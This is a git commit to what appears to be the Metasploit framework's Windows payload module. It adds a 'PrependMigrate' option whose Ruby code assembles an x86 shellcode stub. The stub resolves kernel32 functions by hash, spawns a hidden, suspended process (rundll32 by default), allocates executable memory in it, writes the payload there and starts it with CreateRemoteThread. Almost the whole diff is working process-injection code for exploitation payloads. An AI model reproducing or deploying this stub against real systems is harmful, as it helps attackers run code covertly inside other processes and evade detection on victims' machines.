Add migrate stub option to Windows x86 payloads.

Migrate stub spawns payload in new process.
unstable
scriptjunkie 2012-10-14 16:43:07 -05:00
parent 9597e44a95
commit 0564a6eaa7
1 changed files with 200 additions and 2 deletions

View File

@ -26,7 +26,7 @@ module Msf::Payload::Windows
# This mixin is chained within payloads that target the Windows platform.
# It provides special variable substitution for things like EXITFUNC and
# automatically adds it as a required option for exploits that use windows
# payloads.
# payloads. It also provides the migrate prepend.
#
def initialize(info = {})
ret = super( info )
@ -53,10 +53,208 @@ module Msf::Payload::Windows
[
Msf::OptRaw.new('EXITFUNC', [ true, "Exit technique: #{@@exit_types.keys.join(", ")}", 'process' ])
], Msf::Payload::Windows )
register_advanced_options(
[
Msf::OptBool.new('PrependMigrate', [ true, "Spawns and runs shellcode in new process", false ]),
Msf::OptString.new('PrependMigrateProc', [ false, "Process to spawn and run shellcode in" ])
], Msf::Payload::Windows )
ret
end
#
# Overload the generate() call to prefix our stubs
#
def generate(*args)
# Call the real generator to get the payload
buf = super(*args)
pre = ''
test_arch = [ *(self.arch) ]
# Handle all x86 code here
if (test_arch.include?(ARCH_X86))
# PrependMigrate
if (datastore['PrependMigrate'])
payloadsize = "0x%04x" % buf.length
procname = datastore['PrependMigrateProc'] || 'rundll32'
migrate_asm = <<EOS
cld ; Clear the direction flag.
call start ; Call start, this pushes the address of 'api_call' onto the stack.
api_call:
pushad ; We preserve all the registers for the caller, bar EAX and ECX.
mov ebp, esp ; Create a new stack frame
xor edx, edx ; Zero EDX
mov edx, [fs:edx+48] ; Get a pointer to the PEB
mov edx, [edx+12] ; Get PEB->Ldr
mov edx, [edx+20] ; Get the first module from the InMemoryOrder module list
next_mod: ;
mov esi, [edx+40] ; Get pointer to modules name (unicode string)
movzx ecx, word [edx+38] ; Set ECX to the length we want to check
xor edi, edi ; Clear EDI which will store the hash of the module name
loop_modname: ;
xor eax, eax ; Clear EAX
lodsb ; Read in the next byte of the name
cmp al, 'a' ; Some versions of Windows use lower case module names
jl not_lowercase ;
sub al, 0x20 ; If so normalise to uppercase
not_lowercase: ;
ror edi, 13 ; Rotate right our hash value
add edi, eax ; Add the next byte of the name
loop loop_modname ; Loop untill we have read enough
; We now have the module hash computed
push edx ; Save the current position in the module list for later
push edi ; Save the current module hash for later
; Proceed to iterate the export address table,
mov edx, [edx+16] ; Get this modules base address
mov eax, [edx+60] ; Get PE header
add eax, edx ; Add the modules base address
mov eax, [eax+120] ; Get export tables RVA
test eax, eax ; Test if no export address table is present
jz get_next_mod1 ; If no EAT present, process the next module
add eax, edx ; Add the modules base address
push eax ; Save the current modules EAT
mov ecx, [eax+24] ; Get the number of function names
mov ebx, [eax+32] ; Get the rva of the function names
add ebx, edx ; Add the modules base address
; Computing the module hash + function hash
get_next_func: ;
jecxz get_next_mod ; When we reach the start of the EAT (we search backwards), process the next module
dec ecx ; Decrement the function name counter
mov esi, [ebx+ecx*4] ; Get rva of next module name
add esi, edx ; Add the modules base address
xor edi, edi ; Clear EDI which will store the hash of the function name
; And compare it to the one we want
loop_funcname: ;
xor eax, eax ; Clear EAX
lodsb ; Read in the next byte of the ASCII function name
ror edi, 13 ; Rotate right our hash value
add edi, eax ; Add the next byte of the name
cmp al, ah ; Compare AL (the next byte from the name) to AH (null)
jne loop_funcname ; If we have not reached the null terminator, continue
add edi, [ebp-8] ; Add the current module hash to the function hash
cmp edi, [ebp+36] ; Compare the hash to the one we are searchnig for
jnz get_next_func ; Go compute the next function hash if we have not found it
; If found, fix up stack, call the function and then value else compute the next one...
pop eax ; Restore the current modules EAT
mov ebx, [eax+36] ; Get the ordinal table rva
add ebx, edx ; Add the modules base address
mov cx, [ebx+2*ecx] ; Get the desired functions ordinal
mov ebx, [eax+28] ; Get the function addresses table rva
add ebx, edx ; Add the modules base address
mov eax, [ebx+4*ecx] ; Get the desired functions RVA
add eax, edx ; Add the modules base address to get the functions actual VA
; We now fix up the stack and perform the call to the desired function...
finish:
mov [esp+36], eax ; Overwrite the old EAX value with the desired api address for the upcoming popad
pop ebx ; Clear off the current modules hash
pop ebx ; Clear off the current position in the module list
popad ; Restore all of the callers registers, bar EAX, ECX and EDX which are clobbered
pop ecx ; Pop off the origional return address our caller will have pushed
pop edx ; Pop off the hash value our caller will have pushed
push ecx ; Push back the correct return value
jmp eax ; Jump into the required function
; We now automagically return to the correct caller...
get_next_mod: ;
pop eax ; Pop off the current (now the previous) modules EAT
get_next_mod1: ;
pop edi ; Pop off the current (now the previous) modules hash
pop edx ; Restore our position in the module list
mov edx, [edx] ; Get the next module
jmp next_mod ; Process this module
;--------------------------------------------------------------------------------------
start: ;
pop ebp ; Pop off the address of 'api_call' for calling later.
; get our own startupinfo at esp+0x60
add esp,-400 ; adjust the stack to avoid corruption
mov edx,esp
add edx,0x60
push edx
push 0xB16B4AB1 ; hash( "kernel32.dll", "GetStartupInfoA" )
call ebp ; GetStartupInfoA( &si );
; ptr to startupinfo is in eax
; pointer to string is in ecx
jmp getcommand
gotcommand:
pop esi ; esi = address of process name (command line)
; create the process
mov edi,eax
add edi,0x60 ; Offset of empty space for lpProcessInformation
push edi ; lpProcessInformation : write processinfo here
push eax ; lpStartupInfo : current info (read)
xor ebx,ebx
push ebx ; lpCurrentDirectory
push ebx ; lpEnvironment
push 0x08000004 ; dwCreationFlags CREATE_NO_WINDOW | CREATE_SUSPENDED
push ebx ; bInHeritHandles
push ebx ; lpThreadAttributes
push ebx ; lpProcessAttributes
push esi ; lpCommandLine
push ebx ; lpApplicationName
push 0x863FCC79 ; hash( "kernel32.dll", "CreateProcessA" )
call ebp ; CreateProcessA( &si );
; allocate memory in the process (VirtualAllocEx())
; get handle
push 0x40 ; RWX
add bh,0x10 ; ebx = 0x1000
push ebx ; MEM_COMMIT
push ebx ; size
xor ebx,ebx
push ebx ; address
push [edi] ; handle
push 0x3F9287AE ; hash( "kernel32.dll", "VirtualAllocEx" )
call ebp ; VirtualAllocEx( ...);
; eax now contains the destination
; WriteProcessMemory()
push esp ; lpNumberOfBytesWritten
push #{payloadsize} ; nSize
; pick up pointer to shellcode & keep it on stack
jmp begin_of_payload
begin_of_payload_return: ; lpBuffer
push eax ; lpBaseAddress
push [edi] ; hProcess
push 0xE7BDD8C5 ; hash( "kernel32.dll", "WriteProcessMemory" )
call ebp ; WriteProcessMemory( ...);
; run the code (CreateRemoteThread())
push ebx ; lpthreadID
push ebx ; run immediately
push ebx ; no parameter
mov ecx,[esp-0x4]
push ecx ; shellcode
push ebx ; stacksize
push ebx ; lpThreadAttributes
push [edi]
push 0x799AACC6 ; hash( "kernel32.dll", "CreateRemoteThread" )
call ebp ; CreateRemoteThread( ...);
;sleep
push -1
push 0xE035F044 ; hash( "kernel32.dll", "Sleep" )
call ebp ; Sleep( ... );
getcommand:
call gotcommand
db "#{procname}"
db 0x00
begin_of_payload:
call begin_of_payload_return
EOS
pre << Metasm::Shellcode.assemble(Metasm::Ia32.new, migrate_asm).encode_string
end
end
return (pre + buf)
end
#
# Replace the EXITFUNC variable like madness
#